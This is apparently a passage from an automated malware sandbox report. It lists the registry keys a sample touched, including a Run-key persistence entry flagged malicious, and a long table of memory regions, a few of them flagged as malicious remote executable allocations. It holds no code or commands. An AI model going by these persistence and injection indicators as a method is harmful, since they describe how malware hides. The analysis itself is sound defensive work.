HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Path
 malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
PerfMMFileName
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 21 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
21900000000
trusted library section
page read and write
 malicious
402000
remote allocation
page execute and read and write
 malicious
835E000
trusted library allocation
page read and write
 malicious
7EE0000
trusted library allocation
page read and write
18712219000
heap
page read and write
B241000
trusted library allocation
page read and write
55FB000
heap
page read and write
1314000
trusted library allocation
page read and write
4BE4000
heap
page read and write
1BB7B7F000
stack
page read and write
46DE000
stack
page read and write
4C01000
heap
page read and write
2940000
trusted library allocation
page read and write
830000
heap
page read and write
5440000
trusted library allocation
page read and write
5594000
heap
page read and write
4740000
heap
page execute and read and write
817000
heap
page read and write
36A3000
trusted library allocation
page execute and read and write
373E000
stack
page read and write
544E000
stack
page read and write
187122BE000
heap
page read and write
67DD000
stack
page read and write
2132B928000
trusted library allocation
page read and write
50C0000
remote allocation
page read and write
720000
heap
page read and write
6AE4EFF000
stack
page read and write
6AE51FF000
stack
page read and write
1BB7D7E000
stack
page read and write
DA0000
heap
page read and write
1E29AD2C000
heap
page read and write
1E29CA0E000
heap
page read and write
70B0000
trusted library allocation
page read and write
298D000
stack
page read and write
1E29AD1F000
heap
page read and write
377E000
stack
page read and write
1E29CA02000
heap
page read and write
7260000
trusted library allocation
page read and write
18714DB9000
heap
page read and write
1F9E745000
stack
page read and write
75E000
heap
page read and write
4BE8000
heap
page read and write
446E000
stack
page read and write
1871432A000
heap
page read and write
4C1E000
heap
page read and write
26B0000
heap
page read and write
1E29CA2E000
heap
page read and write
187142D6000
heap
page read and write
27CE000
stack
page read and write
509E000
stack
page read and write
1E29CA28000
heap
page read and write
187122A6000
heap
page read and write
56E0000
heap
page read and write
7C7000
heap
page read and write
7EC0000
trusted library allocation
page read and write
37B0000
heap
page read and write
1E29ADD0000
heap
page read and write
219409D7000
trusted library allocation
page read and write
2132B8E3000
trusted library allocation
page read and write
6AE4715000
stack
page read and write
1E29CD96000
heap
page read and write
D241000
trusted library allocation
page read and write
187142BD000
heap
page read and write
C70000
heap
page read and write
7E80000
trusted library allocation
page read and write
5310000
heap
page read and write
55CD000
heap
page read and write
6FF2000
heap
page read and write
4BEF000
heap
page read and write
3560000
heap
page read and write
2193E64B000
heap
page read and write
5F5E000
heap
page read and write
D7E5000
trusted library allocation
page read and write
1E29AD56000
heap
page read and write
8950000
trusted library allocation
page read and write
21942849000
trusted library allocation
page read and write
4FEE000
stack
page read and write
352E000
stack
page read and write
1E29CCE0000
heap
page read and write
1E29CD96000
heap
page read and write
1E29ADAA000
heap
page read and write
5DB8000
heap
page read and write
1871226F000
heap
page read and write
7220000
trusted library allocation
page read and write
1E29ADE2000
heap
page read and write
18713CC0000
heap
page read and write
219404A0000
heap
page execute and read and write
2132B8E0000
trusted library allocation
page read and write
55A3000
heap
page read and write
1330000
trusted library allocation
page read and write
18714DB9000
heap
page read and write
469C000
stack
page read and write
2194184D000
trusted library allocation
page read and write
18714BF8000
heap
page read and write
2816000
heap
page read and write
7006000
heap
page read and write
219404A7000
heap
page execute and read and write
34EE000
stack
page read and write
504E000
stack
page read and write
2930000
trusted library allocation
page read and write
13F0000
heap
page read and write
1871404E000
heap
page read and write
521F000
stack
page read and write
7F00000
trusted library allocation
page read and write
2132B8B2000
trusted library allocation
page read and write
55E2000
heap
page read and write
263C000
stack
page read and write
55FB000
heap
page read and write
55FB000
heap
page read and write
2193E63F000
heap
page read and write
18714420000
heap
page read and write
18714DC2000
heap
page read and write
53B3000
heap
page read and write
1243000
heap
page read and write
553E000
stack
page read and write
2194204B000
trusted library allocation
page read and write
679F000
stack
page read and write
50EF000
stack
page read and write
7BD0000
heap
page read and write
7C7C000
heap
page read and write
7CA0000
heap
page read and write
5E5D000
heap
page read and write
5DB1000
heap
page read and write
18714DCA000
heap
page read and write
1E29D6A9000
heap
page read and write
6579000
trusted library allocation
page read and write
1E29CA05000
heap
page read and write
7FC9000
heap
page read and write
4C1B000
heap
page read and write
5772000
trusted library allocation
page read and write
2965000
trusted library allocation
page execute and read and write
6551000
trusted library allocation
page read and write
70D0000
trusted library allocation
page execute and read and write
187142C9000
heap
page read and write
7EB0000
trusted library allocation
page read and write
187121EA000
heap
page read and write
1E29CA2E000
heap
page read and write
18714C39000
heap
page read and write
835000
heap
page read and write
2A1D000
heap
page read and write
2193E609000
heap
page read and write
1871226D000
heap
page read and write
6FA9000
heap
page read and write
29B0000
heap
page read and write
18712249000
heap
page read and write
103E000
stack
page read and write
36B0000
trusted library allocation
page read and write
55FB000
heap
page read and write
1E29D1E0000
trusted library allocation
page read and write
E90000
trusted library allocation
page read and write
7A9000
heap
page read and write
7050000
trusted library allocation
page read and write
1E29AD2F000
heap
page read and write
21326B1A000
heap
page read and write
21326B1B000
heap
page read and write
187121C0000
heap
page read and write
1871435B000
heap
page read and write
21940611000
trusted library allocation
page read and write
29A0000
trusted library allocation
page execute and read and write
187142E6000
heap
page read and write
472E000
stack
page read and write
18714021000
heap
page read and write
1E29ADA0000
heap
page read and write
1E29CE90000
heap
page read and write
1E29CC80000
remote allocation
page read and write
1F9EEFE000
stack
page read and write
2132B9A0000
trusted library allocation
page read and write
3597000
heap
page read and write
1871224B000
heap
page read and write
18714DD7000
heap
page read and write
5510000
trusted library allocation
page read and write
7280000
trusted library allocation
page read and write
293D000
trusted library allocation
page execute and read and write
2132B6F2000
heap
page read and write
6AE4DFF000
stack
page read and write
54BF000
stack
page read and write
2193E688000
heap
page read and write
B269CFE000
stack
page read and write
7A9000
heap
page read and write
18714328000
heap
page read and write
4745000
heap
page execute and read and write
55CD000
heap
page read and write
A4D000
stack
page read and write
5769000
trusted library allocation
page read and write
1E29D7A8000
heap
page read and write
C3B000
heap
page read and write
2132B841000
trusted library allocation
page read and write
50C0000
heap
page read and write
7C79000
heap
page read and write
1E29CDB1000
heap
page read and write
58E6000
trusted library allocation
page read and write
4C01000
heap
page read and write
4FF5000
heap
page execute and read and write
1BB7BFF000
stack
page read and write
18714D79000
heap
page read and write
B26A0FE000
stack
page read and write
1E29CD20000
heap
page read and write
18714BE1000
heap
page read and write
689E000
stack
page read and write
4C01000
heap
page read and write
5E5C000
heap
page read and write
1E29D6A9000
heap
page read and write
55B7000
heap
page read and write
7240000
trusted library allocation
page read and write
1E29CDB8000
heap
page read and write
18714DCF000
heap
page read and write
E83000
trusted library allocation
page execute and read and write
1313000
trusted library allocation
page execute and read and write
792000
heap
page read and write
750000
heap
page read and write
1871404E000
heap
page read and write
B269732000
stack
page read and write
21941C4D000
trusted library allocation
page read and write
7F40000
trusted library allocation
page read and write
81D000
heap
page read and write
18712241000
heap
page read and write
76A000
heap
page read and write
5E5C000
heap
page read and write
1E29D5E0000
heap
page read and write
5592000
heap
page read and write
337E000
stack
page read and write
D10000
heap
page read and write
810000
heap
page read and write
1E29CD5F000
heap
page read and write
5596000
heap
page read and write
5000000
trusted library allocation
page read and write
7230000
trusted library allocation
page read and write
1871404B000
heap
page read and write
18714260000
heap
page read and write
4FE0000
trusted library allocation
page execute and read and write
55BA000
trusted library allocation
page read and write
1E29CA1A000
heap
page read and write
4C01000
heap
page read and write
1E29D1D0000
heap
page read and write
B26A17B000
stack
page read and write
7F9000
heap
page read and write
187142BF000
heap
page read and write
1E29AD78000
heap
page read and write
1871404E000
heap
page read and write
1E29CA00000
heap
page read and write
7C7F000
heap
page read and write
18714475000
heap
page read and write
4ADF000
stack
page read and write
819000
heap
page read and write
2678000
stack
page read and write
1E29CDC2000
heap
page read and write
187121C8000
heap
page read and write
1E29CD98000
heap
page read and write
2132B8AC000
trusted library allocation
page read and write
31B000
stack
page read and write
29B7000
heap
page read and write
55E9000
heap
page read and write
18714C11000
heap
page read and write
1E4003CE000
trusted library allocation
page read and write
54CE000
stack
page read and write
4BE2000
heap
page read and write
18714DBA000
heap
page read and write
793000
heap
page read and write
7A9000
heap
page read and write
1E29CA28000
heap
page read and write
18714067000
heap
page read and write
6AE50FD000
stack
page read and write
7870000
heap
page read and write
1E29D7A8000
heap
page read and write
681E000
stack
page read and write
18714340000
heap
page read and write
2949000
trusted library allocation
page read and write
55E2000
heap
page read and write
7EF0000
trusted library allocation
page read and write
7D9E000
stack
page read and write
29E0000
trusted library allocation
page read and write
18714BE0000
heap
page read and write
7C7000
heap
page read and write
18714D3D000
heap
page read and write
21940040000
heap
page readonly
4C01000
heap
page read and write
18714C91000
heap
page read and write
3690000
trusted library allocation
page read and write
295A000
trusted library allocation
page execute and read and write
49C1000
trusted library allocation
page read and write
1E29AC00000
heap
page read and write
5595000
heap
page read and write
1BB7DFE000
stack
page read and write
1E29AD3D000
heap
page read and write
1871403C000
heap
page read and write
7270000
trusted library allocation
page read and write
2132B8FA000
trusted library allocation
page read and write
C241000
trusted library allocation
page read and write
44A0000
heap
page read and write
18714047000
heap
page read and write
18714035000
heap
page read and write
1E29CD85000
heap
page read and write
7C18000
heap
page read and write
1E29AD1F000
heap
page read and write
5F5E000
heap
page read and write
2193FFD0000
heap
page read and write
2957000
trusted library allocation
page execute and read and write
B269F7E000
stack
page read and write
187142C5000
heap
page read and write
800000
heap
page read and write
2A2D000
heap
page read and write
28D0000
heap
page read and write
4BF0000
heap
page read and write
568E000
heap
page read and write
18714DBD000
heap
page read and write
4C22000
heap
page read and write
187142C4000
heap
page read and write
18714025000
heap
page read and write
18712241000
heap
page read and write
1E29AD2A000
heap
page read and write
C64000
heap
page read and write
B26AB4E000
stack
page read and write
120E000
stack
page read and write
2A23000
heap
page read and write
5F77000
heap
page read and write
2132B8A4000
trusted library allocation
page read and write
2132B9E0000
remote allocation
page read and write
54F0000
heap
page read and write
4BE9000
heap
page read and write
5591000
heap
page read and write
4C01000
heap
page read and write
1871404E000
heap
page read and write
1E400001000
trusted library allocation
page read and write
1E29CA07000
heap
page read and write
6F68000
heap
page read and write
1E29AD70000
heap
page read and write
1E29D5F3000
heap
page read and write
810000
heap
page read and write
3330000
heap
page read and write
2933000
trusted library allocation
page execute and read and write
55E9000
heap
page read and write
778000
heap
page read and write
2132B93F000
trusted library allocation
page read and write
18712288000
heap
page read and write
2132B990000
trusted library allocation
page read and write
5DBD000
heap
page read and write
1E29D6A9000
heap
page read and write
D65000
heap
page read and write
18714036000
heap
page read and write
B269E7C000
stack
page read and write
D1B000
stack
page read and write
18712243000
heap
page read and write
4BDF000
stack
page read and write
219404D0000
heap
page read and write
2132B842000
trusted library allocation
page read and write
72A0000
trusted library allocation
page read and write
29CE000
trusted library allocation
page read and write
D50000
heap
page read and write
7040000
trusted library allocation
page read and write
1E29CA0A000
heap
page read and write
157E000
stack
page read and write
2132B8CE000
trusted library allocation
page read and write
187147D0000
heap
page read and write
2980000
trusted library allocation
page read and write
DF0000
trusted library allocation
page read and write
1E29CDBF000
heap
page read and write
1871428B000
heap
page read and write
18714354000
heap
page read and write
10F7000
stack
page read and write
21940AF2000
trusted library allocation
page read and write
18714320000
heap
page read and write
580E000
stack
page read and write
50C0000
remote allocation
page read and write
1E29CA2E000
heap
page read and write
2193E65F000
heap
page read and write
2910000
trusted library allocation
page read and write
802000
heap
page read and write
29D5000
trusted library allocation
page read and write
32B8000
stack
page read and write
1E29CA2E000
heap
page read and write
55AD000
heap
page read and write
2193E643000
heap
page read and write
1E29ADA0000
heap
page read and write
36A0000
trusted library allocation
page read and write
5924000
trusted library allocation
page read and write
2132B88D000
trusted library allocation
page read and write
4F5C000
stack
page read and write
36D2000
trusted library allocation
page read and write
18714CBB000
heap
page read and write
5941000
trusted library allocation
page read and write
8920000
heap
page read and write
5551000
trusted library allocation
page read and write
E7E000
stack
page read and write
187121E9000
heap
page read and write
2A9E000
stack
page read and write
5DC1000
heap
page read and write
81D000
heap
page read and write
7250000
trusted library allocation
page read and write
1E29AD70000
heap
page read and write
21940EF2000
trusted library allocation
page read and write
1E29D605000
heap
page read and write
121B000
heap
page read and write
7F30000
trusted library allocation
page read and write
1E29CA2E000
heap
page read and write
1E29D7BD000
heap
page read and write
5590000
heap
page read and write
1340000
trusted library allocation
page read and write
1E29CD3F000
heap
page read and write
18712020000
heap
page read and write
4761000
trusted library allocation
page read and write
3798000
trusted library allocation
page read and write
2F6F000
stack
page read and write
1E29D6F5000
heap
page read and write
1E29AD72000
heap
page read and write
69EE000
stack
page read and write
219400D0000
heap
page read and write
1BB77CE000
stack
page read and write
55F0000
heap
page read and write
B269EF8000
stack
page read and write
1871403C000
heap
page read and write
49C5000
trusted library allocation
page read and write
18714BEC000
heap
page read and write
2990000
heap
page readonly
6DFE000
stack
page read and write
36D5000
trusted library allocation
page execute and read and write
57EF000
stack
page read and write
187142B3000
heap
page read and write
2132B858000
trusted library allocation
page read and write
B2697FE000
stack
page read and write
6A2E000
stack
page read and write
4C1B000
heap
page read and write
3610000
heap
page read and write
1F9EFFC000
stack
page read and write
219400D6000
heap
page read and write
794000
heap
page read and write
7C54000
heap
page read and write
285E000
stack
page read and write
1E29AB20000
heap
page read and write
7B6000
heap
page read and write
14FF000
stack
page read and write
1E29CD5F000
heap
page read and write
2193E7D0000
heap
page read and write
2AD0000
heap
page read and write
1E29CDBF000
heap
page read and write
2132B93C000
trusted library allocation
page read and write
187122BE000
heap
page read and write
1E29ADD0000
heap
page read and write
1E29AD2C000
heap
page read and write
1871432A000
heap
page read and write
6BFB000
stack
page read and write
FF0000
heap
page execute and read and write
BF0000
heap
page read and write
18712254000
heap
page read and write
18712365000
heap
page read and write
1E29AD93000
heap
page read and write
53D2000
trusted library allocation
page read and write
36A4000
trusted library allocation
page read and write
58B0000
trusted library allocation
page read and write
B269AFF000
stack
page read and write
5843000
trusted library allocation
page read and write
1871402E000
heap
page read and write
7DB0000
trusted library allocation
page read and write
50C0000
remote allocation
page read and write
1871220E000
heap
page read and write
4C1E000
heap
page read and write
1E29AD19000
heap
page read and write
4C01000
heap
page read and write
70E0000
trusted library allocation
page read and write
4C1E000
heap
page read and write
28EF000
stack
page read and write
7C6C000
heap
page read and write
2EEE000
stack
page read and write
71CE000
stack
page read and write
5593000
heap
page read and write
1E29CA2E000
heap
page read and write
13C0000
heap
page read and write
5866000
trusted library allocation
page read and write
2962000
trusted library allocation
page read and write
792000
heap
page read and write
1E29CA2E000
heap
page read and write
1E29D6A9000
heap
page read and write
E241000
trusted library allocation
page read and write
1E29CD27000
heap
page read and write
1E29D72C000
heap
page read and write
1E29CA1E000
heap
page read and write
1871404E000
heap
page read and write
1E29CCF8000
heap
page read and write
2A4E000
unkown
page read and write
55B2000
heap
page read and write
1E29D150000
heap
page read and write
53B0000
heap
page read and write
18714480000
heap
page read and write
D55000
heap
page read and write
1871404E000
heap
page read and write
1E29CA27000
heap
page read and write
18714C00000
heap
page read and write
1E4003C1000
trusted library allocation
page read and write
7030000
trusted library allocation
page read and write
1E29D62C000
heap
page read and write
55B9000
heap
page read and write
7FC0000
heap
page read and write
762E000
stack
page read and write
1871403A000
heap
page read and write
72B0000
trusted library allocation
page read and write
5444000
trusted library allocation
page read and write
C5E000
heap
page read and write
1E29AD92000
heap
page read and write
55A8000
heap
page read and write
5EDE000
heap
page read and write
187122B8000
heap
page read and write
4F9C000
stack
page read and write
B87000
stack
page read and write
36D0000
trusted library allocation
page read and write
21940030000
trusted library allocation
page read and write
3EF1000
trusted library allocation
page read and write
55AA000
heap
page read and write
1E29AD2C000
heap
page read and write
5652000
heap
page read and write
18712253000
heap
page read and write
219409E8000
trusted library allocation
page read and write
1871226D000
heap
page read and write
1E29D655000
heap
page read and write
2928000
heap
page read and write
1E29ACF8000
heap
page read and write
21326B1A000
heap
page read and write
7C43000
heap
page read and write
5938000
trusted library allocation
page read and write
5F6F000
heap
page read and write
1F9F0FC000
stack
page read and write
18714346000
heap
page read and write
7DA0000
heap
page read and write
1871227F000
heap
page read and write
4C1E000
heap
page read and write
1E29D130000
heap
page read and write
7B6000
heap
page read and write
2AC0000
heap
page read and write
35A5000
heap
page read and write
2AA0000
direct allocation
page read and write
2132B844000
trusted library allocation
page read and write
81C1000
trusted library allocation
page read and write
18714348000
heap
page read and write
18714042000
heap
page read and write
18712272000
heap
page read and write
7C64000
heap
page read and write
1BB827B000
stack
page read and write
1E29ADB2000
heap
page read and write
359B000
heap
page read and write
18712100000
heap
page read and write
49C9000
trusted library allocation
page read and write
4E90000
trusted library allocation
page read and write
1BB817E000
stack
page read and write
EA6000
trusted library allocation
page execute and read and write
6F91000
heap
page read and write
5DDD000
heap
page read and write
529E000
stack
page read and write
1E29CA03000
heap
page read and write
18714328000
heap
page read and write
280E000
stack
page read and write
1040000
heap
page read and write
2193E5E0000
heap
page read and write
4C1E000
heap
page read and write
5979000
trusted library allocation
page read and write
1E29D6A9000
heap
page read and write
1E29CA2E000
heap
page read and write
5DDD000
heap
page read and write
1871404E000
heap
page read and write
1E29CC80000
remote allocation
page read and write
187142BB000
heap
page read and write
124F000
heap
page read and write
4FC0000
trusted library allocation
page read and write
18712350000
remote allocation
page read and write
1E29AD7A000
heap
page read and write
1E29CA0E000
heap
page read and write
7C2B000
heap
page read and write
288D000
stack
page read and write
18714450000
heap
page read and write
6AE55FC000
stack
page read and write
2132B910000
trusted library allocation
page read and write
6FA2000
heap
page read and write
18714354000
heap
page read and write
134B000
trusted library allocation
page execute and read and write
1E29ADB2000
heap
page read and write
18714050000
heap
page read and write
4BFC000
heap
page read and write
69AE000
stack
page read and write
5761000
trusted library allocation
page read and write
187142CA000
heap
page read and write
4C1B000
heap
page read and write
18712288000
heap
page read and write
1871404A000
heap
page read and write
18712360000
heap
page read and write
18712241000
heap
page read and write
18714022000
heap
page read and write
1E29AD74000
heap
page read and write
219409DC000
trusted library allocation
page read and write
18712282000
heap
page read and write
360B000
heap
page read and write
55AA000
heap
page read and write
18714066000
heap
page read and write
18714DD7000
heap
page read and write
1E29ADA3000
heap
page read and write
1E29CD32000
heap
page read and write
5EDD000
heap
page read and write
1336000
trusted library allocation
page execute and read and write
1BB7C7D000
stack
page read and write
1E29D7B0000
heap
page read and write
2DD0000
trusted library allocation
page read and write
4BFC000
heap
page read and write
18714CBA000
heap
page read and write
187122B8000
heap
page read and write
1E29CD85000
heap
page read and write
2132B884000
trusted library allocation
page read and write
1E29CD56000
heap
page read and write
6A80000
heap
page read and write
81E000
heap
page read and write
18712120000
heap
page read and write
1E4003C6000
trusted library allocation
page read and write
EC41000
trusted library allocation
page read and write
33C0000
heap
page read and write
1871404E000
heap
page read and write
18712282000
heap
page read and write
187147E0000
trusted library allocation
page read and write
7C5B000
heap
page read and write
5F5E000
heap
page read and write
1E29CD31000
heap
page read and write
B269FFF000
stack
page read and write
1E29AC35000
heap
page read and write
2193E600000
heap
page read and write
5657000
heap
page read and write
187142F1000
heap
page read and write
5640000
heap
page read and write
4C1B000
heap
page read and write
18714020000
heap
page read and write
187142F1000
heap
page read and write
29F0000
heap
page read and write
1E29CA2A000
heap
page read and write
2950000
trusted library allocation
page read and write
1347000
trusted library allocation
page execute and read and write
29F9000
heap
page read and write
58F5000
trusted library allocation
page read and write
1E29CA2E000
heap
page read and write
3780000
heap
page readonly
2930000
heap
page read and write
1BB7AFE000
stack
page read and write
21940833000
trusted library allocation
page read and write
13AE000
stack
page read and write
1BB7E79000
stack
page read and write
4C1E000
heap
page read and write
5CB0000
heap
page read and write
2132B848000
trusted library allocation
page read and write
572E000
trusted library allocation
page read and write
2132B8D1000
trusted library allocation
page read and write
4FBF000
stack
page read and write
2132B855000
trusted library allocation
page read and write
B26A07F000
stack
page read and write
1E29ADB1000
heap
page read and write
1E29D7A9000
heap
page read and write
1BB81FE000
stack
page read and write
2132B947000
trusted library allocation
page read and write
1E29CEF0000
heap
page read and write
1E29CFD5000
heap
page read and write
8399000
trusted library allocation
page read and write
FCB000
trusted library allocation
page execute and read and write
1E29D6AA000
heap
page read and write
1E29CD56000
heap
page read and write
1E29AD70000
heap
page read and write
187121F0000
heap
page read and write
CC41000
trusted library allocation
page read and write
18714DB9000
heap
page read and write
1F9F5FB000
stack
page read and write
3660000
heap
page read and write
1E29CD20000
heap
page read and write
1E29D7B9000
heap
page read and write
4C01000
heap
page read and write
7FBE000
stack
page read and write
1E29CD34000
heap
page read and write
5DD6000
heap
page read and write
4BFB000
heap
page read and write
5EAD000
heap
page read and write
1E29D6A9000
heap
page read and write
21940010000
trusted library allocation
page read and write
810000
heap
page read and write
4FDE000
stack
page read and write
5E36000
heap
page read and write
7E70000
trusted library allocation
page execute and read and write
4FF0000
heap
page execute and read and write
13B0000
trusted library allocation
page execute and read and write
2960000
trusted library allocation
page read and write
460E000
stack
page read and write
B269DFC000
stack
page read and write
1E29CA2E000
heap
page read and write
1E400223000
trusted library allocation
page read and write
4C20000
heap
page read and write
187121F0000
heap
page read and write
7A8E000
stack
page read and write
709D000
stack
page read and write
5E7A000
heap
page read and write
D60000
heap
page read and write
1E29D7A8000
heap
page read and write
C00000
heap
page read and write
1E29AD73000
heap
page read and write
1871402E000
heap
page read and write
53CE000
stack
page read and write
4C1B000
heap
page read and write
2193E7F0000
heap
page read and write
802000
heap
page read and write
1BB7EF7000
stack
page read and write
2EF7000
trusted library allocation
page read and write
1E29CFC0000
heap
page read and write
6F8000
stack
page read and write
1E29CDB8000
heap
page read and write
3941000
trusted library allocation
page read and write
5886000
trusted library allocation
page read and write
2A00000
heap
page read and write
5652000
heap
page read and write
33D0000
heap
page read and write
7CB0000
trusted library allocation
page execute and read and write
7FDA000
heap
page read and write
1E29CDBA000
heap
page read and write
1E400DCE000
trusted library allocation
page read and write
4BEF000
heap
page read and write
1BB7F78000
stack
page read and write
29DA000
trusted library allocation
page read and write
65BE000
trusted library allocation
page read and write
18712350000
remote allocation
page read and write
1E29CDCC000
heap
page read and write
5050000
heap
page read and write
1E4003CA000
trusted library allocation
page read and write
7AE1000
heap
page read and write
1E29CC80000
remote allocation
page read and write
1E29ADE2000
heap
page read and write
1E29AD48000
heap
page read and write
1E29D682000
heap
page read and write
18712350000
remote allocation
page read and write
2941000
trusted library allocation
page read and write
2132B9E0000
remote allocation
page read and write
1871404E000
heap
page read and write
5F6B000
heap
page read and write
36D7000
trusted library allocation
page execute and read and write
6BBD000
stack
page read and write
1E29AD9E000
heap
page read and write
18712200000
heap
page read and write
4750000
heap
page read and write
4C1B000
heap
page read and write
7D7E000
stack
page read and write
18712244000
heap
page read and write
219409E4000
trusted library allocation
page read and write
1E29D5EC000
heap
page read and write
548E000
stack
page read and write
89F0000
heap
page read and write
685D000
stack
page read and write
2132B9E0000
remote allocation
page read and write
535E000
stack
page read and write
5DCA000
heap
page read and write
18714328000
heap
page read and write
4BF8000
heap
page read and write
1E29D7AC000
heap
page read and write
18714DB9000
heap
page read and write
696B000
stack
page read and write
1E29AC40000
heap
page read and write
1E29AD9E000
heap
page read and write
2132B931000
trusted library allocation
page read and write
36B9000
trusted library allocation
page read and write
1E29ADE2000
heap
page read and write
7C09000
heap
page read and write
6D7E000
stack
page read and write
2193E825000
heap
page read and write
9BF1000
trusted library allocation
page read and write
1E29CA2E000
heap
page read and write
6AE4FFD000
stack
page read and write
5EE8000
heap
page read and write
18714048000
heap
page read and write
6F9A000
heap
page read and write
1E29CA15000
heap
page read and write
4BEB000
heap
page read and write
1E29CA2B000
heap
page read and write
18714DD6000
heap
page read and write
2132B925000
trusted library allocation
page read and write
5640000
heap
page read and write
153D000
stack
page read and write
1871402E000
heap
page read and write
18714DC5000
heap
page read and write
7210000
trusted library allocation
page read and write
18714BFE000
heap
page read and write
B26ABCD000
stack
page read and write
1E40007E000
trusted library allocation
page read and write
5640000
heap
page read and write
18714CBA000
heap
page read and write
1871226D000
heap
page read and write
8940000
trusted library allocation
page read and write
4BE1000
heap
page read and write
2132B840000
trusted library allocation
page read and write
4C01000
heap
page read and write
B269C7E000
stack
page read and write
1E29AD48000
heap
page read and write
7B6000
heap
page read and write
1F9F1FD000
stack
page read and write
7F10000
trusted library allocation
page read and write
513E000
stack
page read and write
1E29D7A8000
heap
page read and write
187142B3000
heap
page read and write
EAA000
trusted library allocation
page execute and read and write
1BB80FE000
stack
page read and write
4BE0000
heap
page read and write
2132B8AF000
trusted library allocation
page read and write
91F1000
trusted library allocation
page read and write
35FB000
heap
page read and write
A0E000
stack
page read and write
18712272000
heap
page read and write
4BEC000
heap
page read and write
7E90000
trusted library allocation
page read and write
6FE6000
heap
page read and write
49D2000
trusted library allocation
page read and write
8343000
trusted library allocation
page read and write
720D000
stack
page read and write
1E29AD82000
heap
page read and write
55A5000
heap
page read and write
6C3E000
stack
page read and write
18714031000
heap
page read and write
55A3000
heap
page read and write
75E0000
heap
page read and write
1E29AD1E000
heap
page read and write
1E29CA1C000
heap
page read and write
800000
heap
page read and write
1E29CA01000
heap
page read and write
818000
heap
page read and write
1871428D000
heap
page read and write
B269B7D000
stack
page read and write
F641000
trusted library allocation
page read and write
1E29CA2E000
heap
page read and write
36F0000
trusted library allocation
page read and write
1F9F2FF000
stack
page read and write
758F000
stack
page read and write
47C5000
trusted library allocation
page read and write
18714DB9000
heap
page read and write
1E29ADD0000
heap
page read and write
1871435B000
heap
page read and write
1E29CA11000
heap
page read and write
568E000
heap
page read and write
7CC0000
trusted library allocation
page read and write
187121EF000
heap
page read and write
1E4021CE000
trusted library allocation
page read and write
5F5F000
heap
page read and write
187122B8000
heap
page read and write
56B1000
trusted library allocation
page read and write
1E29CA46000
heap
page read and write
5560000
heap
page read and write
1E29AD18000
heap
page read and write
2ADB000
heap
page read and write
6E32000
heap
page read and write
582B000
stack
page read and write
29C1000
trusted library allocation
page read and write
802000
heap
page read and write
5595000
heap
page read and write
D90000
heap
page read and write
18714023000
heap
page read and write
5591000
heap
page read and write
1E29CA30000
heap
page read and write
5E0B000
heap
page read and write
1871404E000
heap
page read and write
58C6000
trusted library allocation
page read and write
5DBD000
heap
page read and write
1E29ADA0000
heap
page read and write
6313000
trusted library allocation
page read and write
54CE000
stack
page read and write
18712272000
heap
page read and write
2A50000
heap
page read and write
1871432A000
heap
page read and write
B269BFE000
stack
page read and write
800000
heap
page read and write
794000
heap
page read and write
2193E686000
heap
page read and write
6A6A000
stack
page read and write
1E29D5E1000
heap
page read and write
718E000
stack
page read and write
